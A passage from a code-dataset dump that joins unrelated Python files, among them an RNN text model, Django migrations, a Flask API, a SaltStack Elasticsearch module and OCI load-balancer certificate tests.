nmse2 = a['arr_4']
nmse4 = a['arr_6']
for i in range(trial):
if i == 0:
res_CNN = copy.deepcopy(result_CNN_set[0])
else:
for item in res_CNN.keys():
res_CNN[item] += copy.deepcopy(result_CNN_set[i][item])
for item in res_CNN.keys():
res_CNN[item] = copy.deepcopy(res_CNN[item] / trial)
test_accuracy1 = res_CNN['accuracy_test1']
test_accuracy2 = res_CNN['accuracy_test2']
test_accuracy3 = res_CNN['accuracy_test3']
test_accuracy5 = res_CNN['accuracy_test5']
nmse[1] = 10 * np.log10(np.mean(nmse1[~np.isnan(nmse1)]))
nmse[2] = 10 * np.log10(np.mean(nmse2[~np.isnan(nmse2)]))
nmse[4] = 10 * np.log10(np.mean(nmse4[~np.isnan(nmse4)]))
matfile = 'matlab/training_result/cmp_time_trial_{}_K_{}_N_{}_B_{}_E_{}.mat'.format(trial, K, N, B, E)
sio.savemat(matfile, mdict={'test_accuracy1': test_accuracy1[0: 1001], 'test_accuracy2': test_accuracy2[0: 501],
'test_accuracy3': test_accuracy3[0: 1001], 'test_accuracy5': test_accuracy5[0: 501]})
matfile2 = 'matlab/training_result/cmp_time_trial_{}_K_{}_N_{}_B_{}_E_{}_NMSE.mat'.format(trial, K, N, B, E)
sio.savemat(matfile2, mdict={'nmse': nmse})
plt.plot(np.arange(0, len(test_accuracy1)), test_accuracy1, 'k--', label=r'Error-Free Channel')
plt.plot(np.arange(0, 2 * len(test_accuracy2), 2), test_accuracy2, '-o', markersize=6, markevery=100,
label=r'Proposed Scheme')
plt.plot(np.arange(0, len(test_accuracy3)), test_accuracy3, '-*', markersize=8, markevery=100,
label=r'Conventional')
plt.plot(np.arange(0, 2 * len(test_accuracy5), 2), test_accuracy5, '->', markersize=6, markevery=100,
label=r'Existing Scheme')
plt.legend()
plt.xlim([0, 1000])
plt.ylim([0, 0.9])
plt.xlabel('Transmission Time Slot')
plt.ylabel('Test Accuracy')
plt.grid()
plt.show()
|
StarcoderdataPython
|
3527698
|
import os, sys, subprocess
import glob
import datetime
import random
import pyttsx3
import time
import psutil
import speech_recognition as sr
import webbrowser
import requests
#for voice in voices:
# print(voice, voice.id)
def stop(program):
try:
for pid in (process.pid for process in psutil.process_iter() if process.name().lower()== program+".exe"):
os.kill(pid,9)
print(program+" has been stopped.")
except SystemError:
print(SystemError)
def find_file(file):
file = file.replace(" ","*")
path=os.path.join(os.path.expanduser("~"),"Music","*" + file + "*")
path2=os.path.join(os.path.expanduser("~"),"Downloads","*" + file + "*")
file=glob.glob(path,recursive=True) + glob.glob(path2,recursive=True)
return len(file), file
def open_file(filename):
if sys.platform == "win32":
os.startfile(filename)
else:
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
def disrespect():
roast=["You suck at this so much,that it is incomprehensible.",
" Your mom would be proud.......of your dumbness",
"I have a puppy that do this better than you"]
return roast[random.randint(0,2)]
|
StarcoderdataPython
|
8054055
|
<gh_stars>100-1000
import pytest
@pytest.mark.php_fpm
def test_ping(host):
cmd = host.run("php-fpm-healthcheck")
assert cmd.rc == 0
@pytest.mark.php_fpm
def test_ping_verbose(host):
cmd = host.run("php-fpm-healthcheck -v")
assert cmd.rc == 0
assert "Trying to connect to php-fpm via:" in cmd.stdout
assert "status output:" in cmd.stdout
assert "pool:" in cmd.stdout
|
StarcoderdataPython
|
3209
|
<gh_stars>10-100
# Generated by Django 2.1.7 on 2019-08-09 09:36
from django.db import migrations, models
def migrate_public_event(apps, schema_editor):
"""Migrate options previously with no contents (displayed as "Other:")
to a new contents ("other").
The field containing these options is in CommonRequest abstract model,
implemented in WorkshopRequest, WorkshopInquiryRequest, and
SelfOrganizedSubmission models."""
WorkshopRequest = apps.get_model('workshops', 'WorkshopRequest')
WorkshopInquiryRequest = apps.get_model('extrequests',
'WorkshopInquiryRequest')
SelfOrganizedSubmission = apps.get_model('extrequests',
'SelfOrganizedSubmission')
WorkshopRequest.objects.filter(public_event="") \
.update(public_event="other")
WorkshopInquiryRequest.objects.filter(public_event="") \
.update(public_event="other")
SelfOrganizedSubmission.objects.filter(public_event="") \
.update(public_event="other")
class Migration(migrations.Migration):
dependencies = [
('workshops', '0190_auto_20190728_1118'),
('extrequests', '0008_auto_20190809_1004'),
]
operations = [
migrations.AlterField(
model_name='workshoprequest',
name='host_responsibilities',
field=models.BooleanField(default=False, verbose_name='I understand <a href="https://docs.carpentries.org/topic_folders/hosts_instructors/hosts_instructors_checklist.html#host-checklist">the responsibilities of the workshop host</a>, including recruiting local helpers to support the workshop (1 helper for every 8-10 learners).'),
),
migrations.AlterField(
model_name='workshoprequest',
name='requested_workshop_types',
field=models.ManyToManyField(help_text='If your learners are new to programming and primarily interested in working with data, Data Carpentry is likely the best choice. If your learners are interested in learning more about programming, including version control and automation, Software Carpentry is likely the best match. If your learners are people working in library and information related roles interested in learning data and software skills, Library Carpentry is the best choice. Please visit the <a href="https://software-carpentry.org/lessons/">Software Carpentry lessons page</a>, <a href="http://www.datacarpentry.org/lessons/">Data Carpentry lessons page</a>, or the <a href="https://librarycarpentry.org/lessons/">Library Carpentry lessons page</a> for more information about any of our lessons.', limit_choices_to={'active': True}, to='workshops.Curriculum', verbose_name='Which Carpentries workshop are you requesting?'),
),
migrations.AlterField(
model_name='workshoprequest',
name='scholarship_circumstances',
field=models.TextField(blank=True, help_text='Required only if you request a scholarship.', verbose_name='Please explain the circumstances for your scholarship request and let us know what budget you have towards The Carpentries workshop fees.'),
),
migrations.AlterField(
model_name='workshoprequest',
name='public_event',
field=models.CharField(blank=True, choices=[('invite', 'This event is open to learners by invitation only.'), ('closed', 'This event is open to learners inside of my institution.'), ('public', 'This event is open to learners outside of my institution.'), ('other', 'Other:')], default='', help_text='Many of our workshops restrict registration to learners from the hosting institution. If your workshop will be open to registrants outside of your institution please let us know below.', max_length=20, verbose_name='Is this workshop open to the public?'),
),
migrations.RunPython(migrate_public_event),
]
|
StarcoderdataPython
|
168853
|
from huobi import RequestClient
request_client = RequestClient()
trade_statistics = request_client.get_24h_trade_statistics("btcusdt")
print("---- Statistics ----")
print("Timestamp: " + str(trade_statistics.timestamp))
print("High: " + str(trade_statistics.high))
print("Low: " + str(trade_statistics.low))
print("Open: " + str(trade_statistics.open))
print("Close: " + str(trade_statistics.close))
print("Volume: " + str(trade_statistics.volume))
|
StarcoderdataPython
|
1620555
|
<reponame>Naopil/EldenBot<gh_stars>0
import discord
from util.exception import InvalidArgs, NotFound
class CmdReaction:
async def cmd_addreaction(self, *args : str, client, channel, message, **_):
if len(args) < 2:
raise InvalidArgs("Invalid syntax, ``/addreaction message_id emoji_name``")
if not args[0].isdigit():
raise InvalidArgs(f"First argument must be a number, got \"{args[0]}\"")
msg = await channel.fetch_message(int(args[0]))
if not msg:
raise NotFound(f"Message with id \"{args[0]}\" not found")
emoji = discord.utils.get(client.emojis, name=args[1])
if not emoji:
raise NotFound(f"Emoji named \"{args[1]}\" not found")
try:
await message.delete()
except:
pass
await msg.add_reaction(emoji)
|
StarcoderdataPython
|
4890456
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import sys
from setuptools.command.test import test as TestCommand
#try:
# import multiprocessing # Workaround for http://bugs.python.org/issue15881
#except ImportError:
# pass
# Pytest
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['tests', '--verbose']
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
CLASSIFIERS = [
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Programming Language :: Python',
'Programming Language :: JavaScript',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Multimedia :: Sound/Audio',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Topic :: Multimedia :: Sound/Audio :: Players',
'Topic :: Multimedia :: Sound/Audio :: Conversion',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Software Development :: Libraries :: Python Modules',
]
KEYWORDS = 'audio analysis features extraction MIR transcoding graph visualize plot HTML5 interactive metadata player'
setup(
# Package
name='TimeSide-Dummy',
install_requires=[
'timeside',
# Dependencies for Dummy analyzers
],
# PyPI
url='https://github.com/Parisson/TimeSide-Dummy',
description="Dummy TimeSide plugins",
long_description=open('README.rst').read(),
author="<NAME>, <NAME>",
author_email="<EMAIL>, <EMAIL>",
version='0.1',
platforms=['OS Independent'],
license='MIT',
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
include_package_data=True,
zip_safe=False,
# Tests
tests_require=['pytest'],
cmdclass={'test': PyTest},
)
|
StarcoderdataPython
|
9602237
|
times = int(input())
# the whole alphabet
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
for i in range(times):
characters = {char.lower() for char in list(input().rstrip())} # test with set instead of list
#removed unecessary pring...
missing = '' # the missing characters will be added if they are missing
for letter in alphabet:
# for every letter in the alphabet we check if we have it in our string
# if not, we add it to missing
if letter not in characters:
missing += letter
print('pangram' if not missing else 'missing', missing) # replaced panagram with pangram...
|
StarcoderdataPython
|
1963411
|
<filename>rnn_model.py
import tensorflow as tf
import numpy as np
from tensorflow.contrib import rnn
from tensorflow.contrib import legacy_seq2seq
class RNNModel:
def __init__(self,
vocabulary_size,
batch_size,
sequence_length,
hidden_layer_size,
cells_size,
gradient_clip=5.,
training=True):
cells = []
[cells.append(rnn.LSTMCell(hidden_layer_size)) for _ in range(cells_size)]
self.cell = rnn.MultiRNNCell(cells)
self.input_data = tf.placeholder(tf.int32, [batch_size, sequence_length])
self.targets = tf.placeholder(tf.int32, [batch_size, sequence_length])
self.initial_state = self.cell.zero_state(batch_size, tf.float32)
with tf.variable_scope("rnn", reuse=tf.AUTO_REUSE):
softmax_layer = tf.get_variable("softmax_layer", [hidden_layer_size, vocabulary_size])
softmax_bias = tf.get_variable("softmax_bias", [vocabulary_size])
with tf.variable_scope("embedding", reuse=tf.AUTO_REUSE):
embedding = tf.get_variable("embedding", [vocabulary_size, hidden_layer_size])
inputs = tf.nn.embedding_lookup(embedding, self.input_data)
inputs = tf.split(inputs, sequence_length, 1)
inputs = [tf.squeeze(input_, [1]) for input_ in inputs]
def loop(previous, _):
previous = tf.matmul(previous, softmax_layer) + softmax_bias
previous_symbol = tf.stop_gradient(tf.argmax(previous, 1))
return tf.nn.embedding_lookup(embedding, previous_symbol)
with tf.variable_scope("rnn", reuse=tf.AUTO_REUSE):
outputs, last_state = legacy_seq2seq.rnn_decoder(inputs, self.initial_state, self.cell, loop_function=loop if not training else None)
output = tf.reshape(tf.concat(outputs, 1), [-1, hidden_layer_size])
self.logits = tf.matmul(output, softmax_layer) + softmax_bias
self.probabilities = tf.nn.softmax(self.logits)
loss = legacy_seq2seq.sequence_loss_by_example([self.logits], [tf.reshape(self.targets, [-1])], [tf.ones([batch_size * sequence_length])])
with tf.name_scope("cost"):
self.cost = tf.reduce_sum(loss) / batch_size / sequence_length
self.final_state = last_state
self.learning_rate = tf.Variable(0.0, trainable=False)
trainable_vars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, trainable_vars), gradient_clip)
with tf.variable_scope("optimizer", reuse=tf.AUTO_REUSE):
optimizer = tf.train.AdamOptimizer(self.learning_rate)
self.train_op = optimizer.apply_gradients(list(zip(grads, trainable_vars)))
tf.summary.histogram("logits", self.logits)
tf.summary.histogram("probabilitiess", self.probabilities)
tf.summary.histogram("loss", loss)
tf.summary.scalar("cost", self.cost)
tf.summary.scalar("learning_rate", self.learning_rate)
def sample(self, sess, chars, vocabulary, length):
state = sess.run(self.cell.zero_state(1, tf.float32))
text = ""
char = chars[0]
for _ in range(length):
x = np.zeros((1, 1))
x[0, 0] = vocabulary[char]
feed = {self.input_data: x, self.initial_state: state}
[probabilities, state] = sess.run([self.probabilities, self.final_state], feed)
probability = probabilities[0]
total_sum = np.cumsum(probability)
sum = np.sum(probability)
sample = int(np.searchsorted(total_sum, np.random.rand(1) * sum))
predicted = chars[sample]
text += predicted
char = predicted
return text
|
StarcoderdataPython
|
3587317
|
# Generated by Django 2.1.7 on 2019-03-09 06:44
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0005_auto_20190309_0304'),
]
operations = [
migrations.CreateModel(
name='CachedRequestResult',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('provider', models.CharField(max_length=255)),
('key', models.CharField(max_length=255)),
('creation_date', models.DateTimeField(default=django.utils.timezone.now)),
('result', django.contrib.postgres.fields.jsonb.JSONField()),
('expire_date', models.DateTimeField()),
('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cache', to='core.Account')),
],
),
]
|
StarcoderdataPython
|
4940169
|
# ch8ex7_goldbachc
"""Has the find_prime_summands(n) and its supporting functions."""
from math import sqrt, floor
def find_prime_summands(n):
"""Find two primes that add up to n.
Parameters:
n - even natural number"""
if n % 2 == 1:
return None, None
prime = 1
for i in range(n//2):
if is_prime(n-prime):
return prime, n-prime
prime = next_prime(prime)
print("An error occured. Couldn't find two primes adding to ", n)
def is_prime(n):
"""Returns True if n is a prime number, False otherwise."""
for divisor in range(2, floor(sqrt(n)) + 1):
if n % divisor == 0:
return False
return True
def next_prime(n):
"""Returns the next prime number after n."""
while True:
n += 1
if is_prime(n):
return n
|
StarcoderdataPython
|
5051749
|
from flask import request
from flask_restplus import fields, Namespace, Resource
from http import HTTPStatus
from typing import Dict, List
from .. import API_V1
from ..models import Brand
from ..repos import BRANDS
from ..shared.constants import (AUTHORIZATION_HEADER_DESC, NOT_FOUND,
SUCCESSFULLY_ADDED)
from ..shared.utils import token_required
BRAND_NS = Namespace('brands')
@BRAND_NS.route('/')
class BrandList(Resource):
@BRAND_NS.marshal_list_with(Brand.__model__)
def get(self) -> (List[Brand], HTTPStatus):
return BRANDS, HTTPStatus.OK
@BRAND_NS.expect(Brand.__model__, validate=True)
@BRAND_NS.header('Authorization', AUTHORIZATION_HEADER_DESC)
@BRAND_NS.marshal_with(Brand.__model__,
code=HTTPStatus.CREATED,
description=SUCCESSFULLY_ADDED)
@token_required(roles='admin')
def post(self) -> (Brand, HTTPStatus, Dict[str, str]):
if BRANDS:
identifier = max(map(lambda b: b.id, BRANDS)) + 1
else:
identifier = 1
name = API_V1.payload['name']
brand = Brand(identifier, name)
BRANDS.append(brand)
headers = {'Location': f'{request.base_url}{identifier}'}
return brand, HTTPStatus.CREATED, headers
@BRAND_NS.route('/<int:identifier>')
class BrandSingle(Resource):
@BRAND_NS.marshal_with(Brand.__model__)
@BRAND_NS.response(HTTPStatus.NOT_FOUND, NOT_FOUND)
def get(self, identifier: int) -> (Brand, HTTPStatus):
for brand in BRANDS:
if brand.id == identifier:
return brand, HTTPStatus.OK
BRAND_NS.abort(HTTPStatus.NOT_FOUND,
f'Brand not found with id: {identifier}')
|
StarcoderdataPython
|
6618477
|
# -*- coding: utf-8 -*-
'''
Connection module for Elasticsearch
notice: early state, etc.
:depends: elasticsearch
'''
# TODO
# * improve error/ exception handling
# * implement update methods?
from __future__ import absolute_import
# Import Python libs
import logging
log = logging.getLogger(__name__)
# Import third party libs
try:
import elasticsearch
logging.getLogger('elasticsearch').setLevel(logging.CRITICAL)
HAS_ELASTICSEARCH = True
except ImportError:
HAS_ELASTICSEARCH = False
from salt.ext.six import string_types
def __virtual__():
'''
Only load if elasticsearch libraries exist.
'''
if not HAS_ELASTICSEARCH:
return False
return True
def _get_instance(hosts, profile):
'''
Return the elasticsearch instance
'''
if profile:
if isinstance(profile, string_types):
_profile = __salt__['config.option'](profile)
elif isinstance(profile, dict):
_profile = profile
if _profile:
hosts = _profile.get('host')
if not hosts:
hosts = _profile.get('hosts')
if isinstance(hosts, string_types):
hosts = [hosts]
return elasticsearch.Elasticsearch(hosts)
def alias_create(indices, alias, hosts=None, body=None, profile='elasticsearch'):
'''
Create an alias for a specific index/indices
CLI example::
salt myminion elasticsearch.alias_create testindex_v1 testindex
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.put_alias(index=indices, name=alias, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def alias_delete(indices, aliases, hosts=None, body=None, profile='elasticsearch'):
'''
Delete an alias of an index
CLI example::
salt myminion elasticsearch.alias_delete testindex_v1 testindex
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.delete_alias(index=indices, name=aliases)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def alias_exists(aliases, indices=None, hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given alias exists
CLI example::
salt myminion elasticsearch.alias_exists testindex
'''
es = _get_instance(hosts, profile)
try:
if es.indices.exists_alias(name=aliases, index=indices):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
except elasticsearch.exceptions.ConnectionError:
# TODO log error
return None
return None
def alias_get(indices=None, aliases=None, hosts=None, profile='elasticsearch'):
'''
Check for the existence of an alias and if it exists, return it
CLI example::
salt myminion elasticsearch.alias_get testindex
'''
es = _get_instance(hosts, profile)
try:
ret = es.indices.get_alias(index=indices, name=aliases) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def document_create(index, doc_type, body=None, hosts=None, profile='elasticsearch'):
'''
Create a document in a specified index
CLI example::
salt myminion elasticsearch.document_create testindex doctype1 '{}'
'''
es = _get_instance(hosts, profile)
try:
result = es.index(index=index, doc_type=doc_type, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def document_delete(index, doc_type, id, hosts=None, profile='elasticsearch'):
'''
Delete a document from an index
CLI example::
salt myminion elasticsearch.document_delete testindex doctype1 AUx-384m0Bug_8U80wQZ
'''
es = _get_instance(hosts, profile)
try:
if not index_exists(index=index):
return True
else:
result = es.delete(index=index, doc_type=doc_type, id=id)
if result.get('found', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def document_exists(index, id, doc_type='_all', hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given document exists
CLI example::
salt myminion elasticsearch.document_exists testindex AUx-384m0Bug_8U80wQZ
'''
es = _get_instance(hosts, profile)
try:
if es.exists(index=index, id=id, doc_type=doc_type):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
except elasticsearch.exceptions.ConnectionError:
# TODO log error
return None
return None
def document_get(index, id, doc_type='_all', hosts=None, profile='elasticsearch'):
'''
Check for the existence of a document and if it exists, return it
CLI example::
salt myminion elasticsearch.document_get testindex AUx-384m0Bug_8U80wQZ
'''
es = _get_instance(hosts, profile)
try:
ret = es.get(index=index, id=id, doc_type=doc_type) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_create(index, body=None, hosts=None, profile='elasticsearch'):
'''
Create an index
CLI example::
salt myminion elasticsearch.index_create testindex
'''
es = _get_instance(hosts, profile)
try:
if index_exists(index):
return True
else:
result = es.indices.create(index=index, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_delete(index, hosts=None, profile='elasticsearch'):
'''
Delete an index
CLI example::
salt myminion elasticsearch.index_delete testindex
'''
es = _get_instance(hosts, profile)
try:
if not index_exists(index=index):
return True
else:
result = es.indices.delete(index=index)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_exists(index, hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given index exists
CLI example::
salt myminion elasticsearch.index_exists testindex
'''
es = _get_instance(hosts, profile)
try:
if not isinstance(index, list):
index = [index]
if es.indices.exists(index=index):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
except elasticsearch.exceptions.ConnectionError:
# TODO log error
return None
return None
def index_get(index, hosts=None, profile='elasticsearch'):
'''
Check for the existence of an index and if it exists, return it
CLI example::
salt myminion elasticsearch.index_get testindex
'''
es = _get_instance(hosts, profile)
try:
if index_exists(index):
ret = es.indices.get(index=index) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def mapping_create(index, doc_type, body, hosts=None, profile='elasticsearch'):
'''
Create a mapping in a given index
CLI example::
salt myminion elasticsearch.mapping_create testindex user '{ "user" : { "properties" : { "message" : {"type" : "string", "store" : true } } } }'
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.put_mapping(index=index, doc_type=doc_type, body=body) # TODO error handling
return mapping_get(index, doc_type)
except elasticsearch.exceptions.NotFoundError:
return None
return None
def mapping_delete(index, doc_type, hosts=None, profile='elasticsearch'):
'''
Delete a mapping (type) along with its data
CLI example::
salt myminion elasticsearch.mapping_delete testindex user
'''
es = _get_instance(hosts, profile)
try:
# TODO check if mapping exists, add method mapping_exists()
result = es.indices.delete_mapping(index=index, doc_type=doc_type)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def mapping_get(index, doc_type, hosts=None, profile='elasticsearch'):
'''
Retrieve mapping definition of index or index/type
CLI example::
salt myminion elasticsearch.mapping_get testindex user
'''
es = _get_instance(hosts, profile)
try:
ret = es.indices.get_mapping(index=index, doc_type=doc_type) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_create(name, body, hosts=None, profile='elasticsearch'):
'''
Create an index template
CLI example::
salt myminion elasticsearch.index_template_create testindex_templ '{ "template": "logstash-*", "order": 1, "settings": { "number_of_shards": 1 } }'
'''
es = _get_instance(hosts, profile)
try:
result = es.indices.put_template(name=name, body=body) # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_delete(name, hosts=None, profile='elasticsearch'):
'''
Delete an index template (type) along with its data
CLI example::
salt myminion elasticsearch.index_template_delete testindex_templ user
'''
es = _get_instance(hosts, profile)
try:
# TODO check if template exists, add method template_exists() ?
result = es.indices.delete_template(name=name)
if result.get('acknowledged', False): # TODO error handling
return True
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_exists(name, hosts=None, profile='elasticsearch'):
'''
Return a boolean indicating whether given index template exists
CLI example::
salt myminion elasticsearch.index_template_exists testindex_templ
'''
es = _get_instance(hosts, profile)
try:
if es.indices.exists_template(name=name):
return True
else:
return False
except elasticsearch.exceptions.NotFoundError:
return None
return None
def index_template_get(name, hosts=None, profile='elasticsearch'):
'''
Retrieve template definition of index or index/type
CLI example::
salt myminion elasticsearch.index_template_get testindex_templ user
'''
es = _get_instance(hosts, profile)
try:
ret = es.indices.get_template(name=name) # TODO error handling
return ret
except elasticsearch.exceptions.NotFoundError:
return None
return None
|
StarcoderdataPython
|
1860001
|
<gh_stars>100-1000
# Copyright (c) 2017, 2018, 2019, Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
import pytest
from nose.plugins.skip import SkipTest
import logging
from ansible.modules.cloud.oracle import oci_load_balancer_certificate
from ansible.module_utils.oracle import oci_lb_utils
import tempfile
import os
from ansible.module_utils import six
try:
import oci
from oci.util import to_dict
from oci.load_balancer.models import (
Certificate,
WorkRequest,
CreateCertificateDetails,
)
from oci.exceptions import ServiceError, ClientError
except ImportError:
raise SkipTest("test_oci_load_balancer_certificate.py requires `oci` module")
class FakeModule(object):
def __init__(self, **kwargs):
self.params = kwargs
def fail_json(self, *args, **kwargs):
self.exit_args = args
self.exit_kwargs = kwargs
raise Exception(kwargs["msg"])
def exit_json(self, *args, **kwargs):
self.exit_args = args
self.exit_kwargs = kwargs
@pytest.fixture()
def lb_client(mocker):
mock_lb_client = mocker.patch(
"oci.load_balancer.load_balancer_client.LoadBalancerClient"
)
return mock_lb_client.return_value
@pytest.fixture()
def get_certificate_patch(mocker):
return mocker.patch.object(oci_lb_utils, "get_certificate")
@pytest.fixture()
def is_same_certificate_patch(mocker):
return mocker.patch.object(oci_lb_utils, "is_same_certificate")
@pytest.fixture()
def create_or_update_lb_resources_and_wait_patch(mocker):
return mocker.patch.object(oci_lb_utils, "create_or_update_lb_resources_and_wait")
@pytest.fixture()
def delete_lb_resources_and_wait_patch(mocker):
return mocker.patch.object(oci_lb_utils, "delete_lb_resources_and_wait")
def setUpModule():
logging.basicConfig(
filename="/tmp/oci_ansible_module.log", filemode="a", level=logging.INFO
)
oci_load_balancer_certificate.set_logger(logging)
def test_create_certificate(
lb_client, get_certificate_patch, create_or_update_lb_resources_and_wait_patch
):
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
get_certificate_patch.side_effect = [None, certificate]
create_or_update_lb_resources_and_wait_patch.return_value = dict(
certificate=to_dict(certificate), changed=True
)
result = oci_load_balancer_certificate.create_certificate(lb_client, module)
delete_cert_bundle(certificate_bundle)
assert result["changed"] is True
def test_create_certificate_certificate_exists_with_different_attribute_values(
lb_client, get_certificate_patch, is_same_certificate_patch
):
module = get_module(dict())
error_message = (
"Certificate "
+ module.params.get("name")
+ " with different attribute value already available in load balancer "
+ module.params.get("load_balancer_id")
)
certificate = get_certificate(dict())
get_certificate_patch.return_value = certificate
is_same_certificate_patch.return_value = False
try:
oci_load_balancer_certificate.create_certificate(lb_client, module)
except Exception as ex:
assert error_message in ex.args[0]
def test_create_certificate_certificate_exists_with_same_attribute_values(
lb_client, get_certificate_patch, is_same_certificate_patch
):
module = get_module(dict())
certificate = get_certificate(dict())
get_certificate_patch.return_value = certificate
is_same_certificate_patch.return_value = True
result = oci_load_balancer_certificate.create_certificate(lb_client, module)
assert result["changed"] is False
def test_create_certificate_service_error(lb_client, get_certificate_patch):
error_message = "Internal Server Error"
module = get_module(dict())
get_certificate_patch.return_value = None
lb_client.create_certificate.side_effect = ServiceError(
499, "InternalServerError", dict(), error_message
)
try:
oci_load_balancer_certificate.create_certificate(lb_client, module)
except Exception as ex:
assert error_message in ex.args[0]
def test_create_certificate_client_error(lb_client, get_certificate_patch):
error_message = "Work Request Failed"
module = get_module(dict())
get_certificate_patch.return_value = None
create_or_update_lb_resources_and_wait_patch.side_effect = ClientError(
Exception("Work Request Failed")
)
try:
oci_load_balancer_certificate.create_certificate(lb_client, module)
except Exception as ex:
assert error_message in ex.args[0]
"""
def test_get_existing_certificate(lb_client):
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
lb_client.list_certificates.return_value = get_response(
200, None, [certificate], None)
result = oci_load_balancer_certificate.get_existing_certificate(
lb_client, module, 'ocid1.loadbalancer.aaaa', module.params.get('name'))
delete_cert_bundle(certificate_bundle)
assert result.certificate_name is module.params.get('name')
def test_get_existing_certificate_not_found(lb_client):
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
lb_client.list_certificates.return_value = get_response(
200, None, [certificate], None)
result = oci_load_balancer_certificate.get_existing_certificate(
lb_client, module, 'ocid1.loadbalancer.aaaa', 'other_name')
delete_cert_bundle(certificate_bundle)
assert result is None
def test_get_existing_certificate_service_error(lb_client):
error_message = "Internal Server Error"
certificate_bundle = get_certificate_bundle()
module = get_module(certificate_bundle)
certificate = get_certificate(certificate_bundle)
lb_client.list_certificates.side_effect = ServiceError(
499, 'InternalServerError', dict(), error_message)
delete_cert_bundle(certificate_bundle)
try:
result = oci_load_balancer_certificate.get_existing_certificate(
lb_client, module, 'ocid1.loadbalancer.aaaa', 'other_name')
except Exception as ex:
assert error_message in ex.args[0]
def test_is_same_certificate_true():
certificate_bundle = get_certificate_bundle()
certificate = get_certificate(certificate_bundle)
create_certificate_details = CreateCertificateDetails()
create_certificate_details.ca_certificate = certificate.ca_certificate
create_certificate_details.certificate_name = certificate.certificate_name
create_certificate_details.public_certificate = certificate.public_certificate
result = oci_load_balancer_certificate.is_same_certificate(create_certificate_details, certificate)
delete_cert_bundle(certificate_bundle)
assert result is True
def test_is_same_certificate_false():
certificate_bundle = get_certificate_bundle()
certificate = get_certificate(certificate_bundle)
create_certificate_details = CreateCertificateDetails()
create_certificate_details.ca_certificate = certificate.ca_certificate
create_certificate_details.certificate_name = 'other_name'
create_certificate_details.public_certificate = certificate.public_certificate
result = oci_load_balancer_certificate.is_same_certificate(create_certificate_details, certificate)
delete_cert_bundle(certificate_bundle)
assert result is False
"""
def test_delete_certificate(lb_client, delete_lb_resources_and_wait_patch):
module = get_module(dict())
certificate = get_certificate(dict())
delete_lb_resources_and_wait_patch.return_value = dict(
certificate=to_dict(certificate), changed=True
)
result = oci_load_balancer_certificate.delete_certificate(lb_client, module)
assert result["changed"] is True
def get_certificate(cert_bundle):
certificate = Certificate()
certificate.ca_certificate = cert_bundle.get("ca_certificate")
certificate.public_certificate = cert_bundle.get("public_certificate")
certificate.certificate_name = "test_certificate"
return certificate
def get_certificate_bundle():
cert_attributes = ["ca_certificate", "private_key", "public_certificate"]
cert_bundle = dict()
for cert_attribute in cert_attributes:
new_file, filename = tempfile.mkstemp()
os.write(new_file, b"Certificate content")
cert_bundle.update({cert_attribute: filename})
return cert_bundle
def delete_cert_bundle(certificate_bundle):
cert_attributes = ["ca_certificate", "private_key", "public_certificate"]
for dummy, value in six.iteritems(certificate_bundle):
os.remove(value)
def get_response(status, header, data, request):
return oci.Response(status, header, data, request)
def get_module(additional_properties):
params = {
"load_balancer_id": "ocid1.loadbalancer.oc1.iad.aaaaa",
